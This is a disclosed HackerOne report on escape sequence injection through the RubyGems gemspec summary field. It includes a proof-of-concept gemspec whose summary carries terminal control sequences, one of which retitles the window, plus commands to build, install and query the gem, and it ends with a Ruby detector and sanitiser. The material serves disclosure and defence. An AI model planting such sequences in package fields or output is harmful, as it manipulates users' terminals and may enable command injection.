RubyGems: Escape sequence injection in "summary" field

HackerOne report H1:226335
Reported: 2017-05-05 13:35:48
Reporter: mame
Program: hackerone.com
Bounty: $500
EPSS: 0.02 (Low), percentile 89.0%

It seems that any escape sequence can be included in the “summary” field of a gemspec. This allows an attacker to inject escape sequences into a victim’s terminal emulator.

How to attack

  1. An attacker creates a gem whose summary string includes malicious escape sequences and pushes it to rubygems.org.
  2. A victim executes gem search attackers-gem -d, and the malicious string is printed in the terminal emulator.

In general, this is considered vulnerable. I’d like you to read Terminal Emulator Security Issues in detail. In short, an attacker can exploit this not only to surprise a victim with a rainbow string, but also to inject a malicious command into a victim’s terminal, which may lead to arbitrary code execution. Ruby WEBrick also handled a similar issue as a vulnerability.

Proof of concept

  1. Prepare the following gemspec.
Gem::Specification.new do |spec|
  spec.name     = "escape-sequence-injection-vulnerability"
  spec.version  = "0.0.1"
  spec.authors  = ["Yusuke Endoh"]
  spec.email    = ["[email protected]"]
  spec.summary  = "foo\e[31mbar\e[0mbaz \e]2;BOOM!\a"
  spec.homepage = "http://example.com/"
  spec.license  = "MIT"
end
  2. Run the following commands.
gem build escape-sequence-injection-vulnerability.gemspec
gem install escape-sequence-injection-vulnerability-0.0.1.gem
  3. Run the following command.
gem query escape-sequence-injection-vulnerability -d && sleep 10

You will see a summary line “foobarbaz” (with “bar” in red), and the window title changed to “BOOM!”.
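As an added example (not code from the report or from RubyGems itself), the following Ruby shows the defensive side: it detects terminal control sequences in a gemspec text field and renders the field inertly before it reaches the terminal. The function names and the regex are this example's own choice, not RubyGems' actual fix; the sample string is the summary from the proof of concept above.

```ruby
# Added example: detect and neutralise terminal control sequences in a
# gemspec field before a command such as `gem query -d` prints it.

# Constructed sample: the summary string from the proof of concept.
POC_SUMMARY = "foo\e[31mbar\e[0mbaz \e]2;BOOM!\a".freeze

# The sequence kinds a terminal emulator interprets:
#   CSI   ESC [ parameters intermediates final-byte   (colours, cursor)
#   OSC   ESC ] text, ended by BEL or ESC backslash    (window title)
#   other any remaining C0 control byte (ESC included) or DEL,
#         with TAB and LF left alone as legitimate whitespace
CONTROL_SEQUENCE = /
    \e\[[\x30-\x3f]*[\x20-\x2f]*[\x40-\x7e]   # CSI
  | \e\][^\x07\x1b]*(?:\x07|\e\\)             # OSC with BEL or ST terminator
  | [\x00-\x08\x0b-\x1f\x7f]                  # other C0 controls, DEL
/x

# Returns every raw control sequence found in the field, in order.
def control_sequences(text)
  text.scan(CONTROL_SEQUENCE)
end

# True when the field contains anything a terminal would act on.
def unsafe_for_terminal?(text)
  !control_sequences(text).empty?
end

# Replace each control byte with a visible, inert spelling
# ("\e" becomes the two characters backslash-e, "\a" backslash-a,
# anything else \xNN) so the text can be printed without side effects.
def sanitize_for_terminal(text)
  text.gsub(/[\x00-\x08\x0b-\x1f\x7f]/) do |c|
    case c
    when "\e" then "\\e"
    when "\a" then "\\a"
    else format("\\x%02x", c.ord)
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "control sequences: #{control_sequences(POC_SUMMARY).map(&:inspect).join(', ')}"
  puts "sanitized summary: #{sanitize_for_terminal(POC_SUMMARY)}"
end
```

The same check can be applied to every free-text gemspec field (description, authors, post-install messages), since any of them may end up on a terminal.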